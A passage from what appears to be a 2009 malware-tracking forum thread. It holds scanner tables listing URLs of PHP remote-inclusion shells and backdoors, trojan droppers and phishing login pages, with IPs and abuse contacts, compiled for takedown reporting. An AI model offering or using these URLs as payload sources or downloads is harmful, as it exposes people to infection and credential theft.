| 2009-07-19 19:27:06  | undef   | unknown_html_RFI_php  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/djerink_anyib/BaruLagi/Baru.txt                        |
| 2009-07-19 19:05:16  | avira   | EXP/PHP.E             | 82.204.219.221  | noc@pochta.ru                    | RU      | RIPE   | POCHTA_RU-NET              | http://god.paypalgod.pochta.ru/flashcard/cmd.txt                                |
| 2009-07-19 19:04:13  | undef   | unknown_html_RFI_php  | 211.234.100.83  | kidc@hanbiro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.sh1908.org//bbs/1.txt                                                |
| 2009-07-19 18:17:23  | avira   | SPR/PHP.Small.F       | 81.223.41.226   | abuse@inode.at                   | AT      | RIPE   | CISC-Semiconductor         | http://www.cisc.at/survey/classes/core/key.gif                                  |
| 2009-07-19 17:57:14  | avira   | PHP/C99Shell.C        | 201.33.17.118   | contato@datacorpore.com.br       | BR      | LACNIC | 008.210.265/0001-26        | ftp://oceanovirtual.com.br:200677@oceanovirtual.com.br/x/web.php                |
| 2009-07-19 16:58:14  | clamav  | PHP.Bot-6             | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://uciha.fileave.com/Nanderz.txt                                            |
| 2009-07-19 15:17:43  | undef   | unknown_html_RFI_php  | 206.221.191.3   | domain@corporatesummaries.com    | US      | ARIN   | CORPORATESUMMARIES         | http://coinheaven.com/blog/images/hard/fx2id.txt                                |
| 2009-07-19 15:07:55  | undef   | unknown_html_RFI_php  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/kelvin_aja/ping.txt                                    |
| 2009-07-19 14:39:14  | undef   | unknown_html_RFI_php  | 64.185.237.80   | Domains@cbcast.net               | US      | ARIN   | CBCAST                     | http://www.pupapa.com/zero/tmp/sp.v                                             |
| 2009-07-19 12:48:51  | avira   | BDS/PHP.Agent.BH      | 79.174.72.79    | abuse@hc.ru                      | RU      | RIPE   | HOSTING-COMPANY-NET        | http://www.cityfit.ru/stat/dtc.txt                                              |
| 2009-07-19 12:27:24  | avira   | PHP/Pbot.A            | 200.87.164.22   | ip@ENTELNET.BO                   | BO      | LACNIC | BO-ESEN-LACNIC             | http://www.sanagustin.edu.bo/modules/aprinter.xpp                               |
| 2009-07-19 12:00:45  | avira   | PHP/BackDoor.AR       | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events//ws/_b                                           |
| 2009-07-19 11:58:27  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events//ws/_a                                           |
| 2009-07-19 11:41:41  | avira   | PHP/Spam.5833         | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/urgly@ymail.com/money.txt                              |
| 2009-07-19 11:31:32  | avira   | BDS/PHP.ali.9         | 69.89.31.237    | abuse@bluehost.com               | US      | ARIN   | BLUEHOST-NETWORK-1         | http://www.todsaporn.com/test/cfg                                               |
| 2009-07-19 10:19:13  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://bangsat5.fileave.com/id.txt                                              |
| 2009-07-19 09:20:00  | avira   | SPR/PHP.ID            | 61.59.200.127   | ccyang@du.net.tw                 | TW      | APNIC  | SEEDNET-TW                 | http://61.59.200.127/appserv/z.txt                                              |
| 2009-07-19 08:59:23  | avira   | PHP/BackDoor.AR       | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICAN
Title: Re: daily something......
Post by: cleanmx on July 21, 2009, 12:46:59 pm
and all malware @ripway.com

Code: [Select]
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname                 | review       | email        | country | source | netname     | url                                                                                 |
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| 2009-07-21 13:25:19  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zh4ck3rz/out.exe                                               |
| 2009-07-21 13:25:18  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yjm/sex.exe                                                    |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/YouareaLoser/                                                  |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aleo          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/3.exe                                                 |
| 2009-07-21 13:25:18  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/up7.exe                                               |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aleo          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yourtube/windows.exe                                           |
| 2009-07-21 13:25:18  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yrr/sysem.exe                                                  |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/yusron16/fs.html                                               |
| 2009-07-21 13:25:18  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zabado2010/3.exe                                               |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&amp;size                        |
| 2009-07-21 13:25:18  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&amp;size=                       |
| 2009-07-21 13:25:18  | avira   | DR/Turkojan.evn           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zenaeshta/lamees.com                                           |
| 2009-07-21 13:25:18  | avira   | TR/AntiAV.SU              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/alsafah.exe                                           |
| 2009-07-21 13:25:18  | avira   | BDS/Bifrose.aqib          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/non.exe                                               |
| 2009-07-21 13:25:18  | avira   | TR/Dldr.VB.JTZ            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zero0007/ser.exe                                               |
| 2009-07-21 13:25:17  | avira   | TR/Poison.ymq             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xdanker/xserver.exe                                            |
| 2009-07-21 13:25:17  | avira   | TR/Spy.335908             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xtorrentsx/Drew.exe                                            |
| 2009-07-21 13:25:17  | avira   | DR/DNSChanger.nvj         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/y/startimes.exe                                                |
| 2009-07-21 13:25:16  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/welaa/s.exe                                                    |
| 2009-07-21 13:25:16  | avira   | TR/Agent.buag.70          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/windazo/piczo.exe                                              |
| 2009-07-21 13:25:16  | avira   | TR/Midgare.NFV.1          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/rock.exe                                              |
| 2009-07-21 13:25:16  | avira   | TR/Poison.yeg             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setup-.exe                                            |
| 2009-07-21 13:25:16  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setup.exe                                             |
| 2009-07-21 13:25:16  | avira   | TR/Midgare.NFV.1          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/winmaton/setupe.exe                                            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/wonderboy3453/login.php                                        |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula                                            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/                                           |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/auth/identity_verification.html            |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/WoWotLK                                                        |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/WrathoftheLK                                                   |
| 2009-07-21 13:25:16  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/WrathoftheLK/                                                  |
| 2009-07-21 13:25:16  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/x0v/1.exe                                                      |
| 2009-07-21 13:25:16  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xabiib12/pics.exe                                              |
| 2009-07-21 13:25:16  | avira   | TR/Spy.68608.8            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/xaxax123/c.exe                                                 |
| 2009-07-21 13:25:15  | avira   | TR/Midgare.xob            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/ufc/crypted%20kaboss.exe                                       |
| 2009-07-21 13:25:15  | avira   | BDS/Poison.agqf           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/UFC/youe.exe                                                   |
| 2009-07-21 13:25:15  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/vbforum/msn.exe                                                |
| 2009-07-21 13:25:15  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/venusvhi/iseng/login.php                                       |
| 2009-07-21 13:25:15  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/verificationmail/paypal.htm                                    |
| 2009-07-21 13:25:15  | avira   | WORM/SdBot.DWZ            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/video13/telecharger_activx.exe                                 |
| 2009-07-21 13:25:15  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/vjayskate/login.html                                           |
| 2009-07-21 13:25:14  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/tim18/files.php                                                |
| 2009-07-21 13:25:14  | avira   | W32/Parite                | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/toxick/johnn.exe                                               |
| 2009-07-21 13:25:14  | avira   | BDS/Hamweq                | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/toxick/tox.exe                                                 |
| 2009-07-21 13:25:14  | avira   | BDS/Hupigon.Gen           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/tr0jan/server.exe                                              |
| 2009-07-21 13:25:14  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/tramatiized/metus_setup.exe                                    |
| 2009-07-21 13:25:13  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/susanneluv/index.html                                          |
| 2009-07-21 13:25:13  | avira   | TR/Agent.11216            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/swat/ser.exe                                                   |
| 2009-07-21 13:25:13  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/t11/imagshow.exe                                               |
| 2009-07-21 13:25:13  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/tarki2008/login.php                                            |
| 2009-07-21 13:25:12  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/silverservant/log1n.html                                       |
| 2009-07-21 13:25:12  | avira   | W32/Mabezat               | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/skype911/nane.exe                                              |
| 2009-07-21 13:25:12  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/soso263/sbb.wmv                                                |
| 2009-07-21 13:25:12  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/soxu/new.exe                                                   |
| 2009-07-21 13:25:12  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/steve777/friendster/login.html                                 |
| 2009-07-21 13:25:11  | avira   | BDS/Bifrose.akbc          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/sara/videu.exe                                                 |
| 2009-07-21 13:25:11  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/saudifox/sarver.exe                                            |
| 2009-07-21 13:25:11  | avira   | BDS/Hupigon.Gen           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/seagirt007/seagirt.exe                                         |
| 2009-07-21 13:25:11  | undef   | unknown_exe               | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/shaded1212/shaded.exe                                          |
| 2009-07-21 13:25:11  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/shakagp/login.php                                              |
| 2009-07-21 13:25:11  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/shellh4ck/s.h.exe                                              |
| 2009-07-21 13:25:11  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/shellh4ck/shellhack.exe                                        |
| 2009-07-21 13:25:11  | avira   | TR/Crypt.XPACK.Gen        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/shvi/free.exe                                                  |
| 2009-07-21 13:25:09  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rs26/index.php?link=http://&amp;size=                          |
| 2009-07-21 13:25:09  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rs54/index.php                                                 |
| 2009-07-21 13:25:09  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/ruileee/ruileeehack/fakelogin.php                              |
| 2009-07-21 13:25:08  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rootsystem/login/login.php                                     |
| 2009-07-21 13:25:08  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rs26/index.php?link=http://&amp;size                           |
| 2009-07-21 13:25:08  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/roixahinhbong/inst_speeder.exe                                 |
| 2009-07-21 13:25:07  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php?                                          |
| 2009-07-21 13:25:07  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rapiddshar                                                     |
| 2009-07-21 13:25:07  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rapiddshar/                                                    |
| 2009-07-21 13:25:07  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rapiidshare                                                    |
| 2009-07-21 13:25:06  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/premansini/friendsterz/friendster.html                         |
| 2009-07-21 13:25:06  | avira   | TR/Crypt.XPACK.Gen        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/pri55ce/wep-top/wep.exe                                        |
| 2009-07-21 13:25:06  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/q1qfr/a.exe                                                    |
| 2009-07-21 13:25:06  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/q28y/calculator33.exe                                          |
| 2009-07-21 13:25:06  | avira   | TR/Crypt.XPACK.Gen        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/q28y/lol%20has%20been%20fucked.exe                             |
| 2009-07-21 13:25:06  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/q8888p/obadah.scr                                              |
| 2009-07-21 13:25:06  | avira   | TR/Crypt.XDR.Gen          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/qwe020/bound.exe                                               |
| 2009-07-21 13:25:06  | avira   | BDS/Poisonivy.E.3         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rabmunna/josh.com                                              |
| 2009-07-21 13:25:06  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php                                           |
| 2009-07-21 13:25:05  | avira   | TR/Spy.Agent.AHAB         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/al%20jazeera%20sport%20player%202.0.exe            |
| 2009-07-21 13:25:05  | avira   | DR/Delphi.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/art%20sport.exe                                    |
| 2009-07-21 13:25:05  | avira   | TR/VB.kmt.37              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/kooora%20canal%201.1.exe                           |
| 2009-07-21 13:25:05  | avira   | TR/Spy.Agent.AHAB         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/star%20monitor%201.0.exe                           |
| 2009-07-21 13:25:05  | avira   | BDS/Bifrose.akbc          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/toolbar-kooora.exe                                 |
| 2009-07-21 13:25:05  | avira   | TR/VB.kmt.7               | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/tv%20player%201.2%20champions%20league.exe         |
| 2009-07-21 13:25:05  | avira   | TR/VB.kmt.9               | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/uefa%20champions%20league%20player.exe             |
| 2009-07-21 13:25:05  | avira   | TR/VB.kmt.37              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paltalk2009/wydad%20xp%201.0.exe                               |
| 2009-07-21 13:25:05  | avira   | TR/TDss.agfj              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/panoky/conreport.pdf                                           |
| 2009-07-21 13:25:05  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/paypai/www.paypal.com                                          |
| 2009-07-21 13:25:05  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/PayPaILogin                                                    |
| 2009-07-21 13:25:05  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/payplal/index.html                                             |
| 2009-07-21 13:25:05  | avira   | DR/bvb.SAG                | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/pic1/server.exe                                                |
| 2009-07-21 13:25:04  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/rentnzm.exe                                        |
| 2009-07-21 13:25:04  | avira   | TR/ATRAPS.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/Tdialer.exe                                        |
| 2009-07-21 13:25:03  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/newly14/Ancient%20Katana/login.html                            |
| 2009-07-21 13:25:03  | avira   | BDS/Bifrose.begy          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/nic/suzan.jpg.exe                                              |
| 2009-07-21 13:25:03  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/Oldfs02/index.html                                             |
| 2009-07-21 13:25:02  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/nethom/tom%20clancys%20hawx%202009eng.exe                      |
| 2009-07-21 13:25:02  | avira   | BDS/Bifrose.bbna.5        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/new1111/keymaker.exe                                           |
| 2009-07-21 13:25:02  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/newhajar/hajarita.exe                                          |
| 2009-07-21 13:25:00  | avira   | SPR/Tool.CeeInject.36797J | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mtall9/hii11.exe                                               |
| 2009-07-21 13:25:00  | avira   | BDS/Bifrose.akbc          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mtall9/www.exe                                                 |
| 2009-07-21 13:25:00  | avira   | DR/Bifrose.bazv.4         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/nada12/face%20on%20body.exe                                    |
| 2009-07-21 13:24:59  | avira   | WORM/SdBot.DGAZ           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/movoo79606/11032009003.mp4.exe                                 |
| 2009-07-21 13:24:59  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428044.mp4.exe                                 |
| 2009-07-21 13:24:59  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428066.mp4.exe                                 |
| 2009-07-21 13:24:59  | avira   | TR/Agent.ckeq             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/movoo79606/mov010220.mpg.exe                                   |
| 2009-07-21 13:24:59  | avira   | DR/Delphi.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mrcloner/svchost.exe                                           |
| 2009-07-21 13:24:59  | avira   | DR/Agent.hua              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/ms3leko/image982-gif.exe                                       |
| 2009-07-21 13:24:59  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mshm/imghp.exe                                                 |
| 2009-07-21 13:24:58  | avira   | TR/Agent.colt             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mov0009809/mov000117.mp4.exe                                   |
| 2009-07-21 13:24:57  | avira   | BDS/Bifrose.ZXE           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/majro7053/l7l.exe                                              |
| 2009-07-21 13:24:57  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/malamhitam/fs.html                                             |
| 2009-07-21 13:24:57  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mambabh/server.exe                                             |
| 2009-07-21 13:24:57  | avira   | BDS/Poison.zzg            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mataz/noor.exe                                                 |
| 2009-07-21 13:24:57  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mazouzi/server.exe                                             |
| 2009-07-21 13:24:57  | avira   | DR/Delphi.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mbc111/aza.exe                                                 |
| 2009-07-21 13:24:57  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/metalrouge0/allchanneltv.exe                                   |
| 2009-07-21 13:24:57  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mlk055/lol.exe                                                 |
| 2009-07-21 13:24:57  | avira   | BDS/Poison.ahap           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mmffmmff/ssaass.exe                                            |
| 2009-07-21 13:24:57  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mobileslive/acceslivemobileconection.htm                       |
| 2009-07-21 13:24:57  | avira   | TR/ATRAPS.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/AK47.exe                                              |
| 2009-07-21 13:24:57  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/imbotpacked.exe                                       |
| 2009-07-21 13:24:57  | avira   | TR/ATRAPS.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mod4sale/lol/server.exe                                        |
| 2009-07-21 13:24:57  | avira   | TR/ATRAPS.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mod4sale/metusdelphi2.8/2.8finalmetus.exe                      |
| 2009-07-21 13:24:57  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/mona51/coffin.exe                                              |
| 2009-07-21 13:24:56  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/liamh/test.php                                                 |
| 2009-07-21 13:24:56  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/live4free/login.html                                           |
| 2009-07-21 13:24:56  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/loginhotmail/update.exe                                        |
